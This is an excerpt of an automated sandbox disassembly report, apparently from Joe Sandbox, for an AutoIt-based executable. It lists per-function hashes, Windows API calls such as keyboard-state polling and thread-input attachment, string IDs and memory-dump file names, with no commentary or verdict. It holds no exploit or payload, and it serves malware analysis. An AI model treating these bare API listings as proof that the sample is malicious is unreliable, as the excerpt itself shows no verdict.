                                                                        • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                        • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                        • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                        • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                        APIs
                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                        • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                        • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                        • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                        • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                        • VariantClear.OLEAUT32(?), ref: 00479489
                                                                        • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                        • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                        • String ID:
                                                                        • API String ID: 2706829360-0
                                                                        • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                        • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                        • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                        • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 0044480E
                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                        • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                        • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                        • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                        • GetKeyState.USER32(00000011), ref: 00444903
                                                                        • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                        • GetKeyState.USER32(00000012), ref: 0044492D
                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                        • GetKeyState.USER32(0000005B), ref: 00444958
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: State$Async$Keyboard
                                                                        • String ID:
                                                                        • API String ID: 541375521-0
                                                                        • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                        • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                        • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                        • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                        • String ID:
                                                                        • API String ID: 3413494760-0
                                                                        • Opcode ID: 6d788ec2be1997d9cec64eaa256864158e09ad3f6105efb05e468561ef8a9f6c
                                                                        • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                        • Opcode Fuzzy Hash: 6d788ec2be1997d9cec64eaa256864158e09ad3f6105efb05e468561ef8a9f6c
                                                                        • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                        • String ID: AU3_FreeVar
                                                                        • API String ID: 2634073740-771828931
                                                                        • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                        • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                        • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                        • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                        APIs
                                                                        • CoInitialize.OLE32 ref: 0046C63A
                                                                        • CoUninitialize.OLE32 ref: 0046C645
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                          • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                        • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                        • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                        • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                        • API String ID: 2294789929-1287834457
                                                                        • Opcode ID: 8665205133a3f3d83065b0d9f42e266eef00d51d9f24292ab734099309a65fda
                                                                        • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                        • Opcode Fuzzy Hash: 8665205133a3f3d83065b0d9f42e266eef00d51d9f24292ab734099309a65fda
                                                                        • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                        APIs
                                                                          • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                          • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                          • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                          • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                        • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                        • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                        • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                        • ReleaseCapture.USER32 ref: 0047116F
                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                        • API String ID: 2483343779-2107944366
                                                                        • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                        • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                        • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                        • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                        • _wcslen.LIBCMT ref: 00450720
                                                                        • _wcscat.LIBCMT ref: 00450733
                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                        • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window_wcscat_wcslen
                                                                        • String ID: -----$SysListView32
                                                                        • API String ID: 4008455318-3975388722
                                                                        • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                        • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                        • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                        • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                        APIs
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                        • GetParent.USER32 ref: 00469C98
                                                                        • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                        • GetParent.USER32 ref: 00469CBC
                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 2360848162-1403004172
                                                                        • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                        • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                        • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                        • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                        • String ID:
                                                                        • API String ID: 262282135-0
                                                                        • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                        • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                        • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                        • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                        • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                        • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                        • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                        • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$LongWindow
                                                                        • String ID:
                                                                        • API String ID: 312131281-0
                                                                        • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                        • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                        • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                        • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                        APIs
                                                                          • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                        • SendMessageW.USER32(76C223D0,00001001,00000000,?), ref: 00448E16
                                                                        • SendMessageW.USER32(76C223D0,00001026,00000000,?), ref: 00448E25
                                                                          • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                        • String ID:
                                                                        • API String ID: 3771399671-0
                                                                        • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                        • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                        • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                        • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                        • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                        • String ID:
                                                                        • API String ID: 2156557900-0
                                                                        • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                        • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                        • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                        • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                        • API String ID: 0-1603158881
                                                                        • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                        • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                        • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                        • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                        APIs
                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                        • DestroyWindow.USER32(?), ref: 00426F50
                                                                        • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                        • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
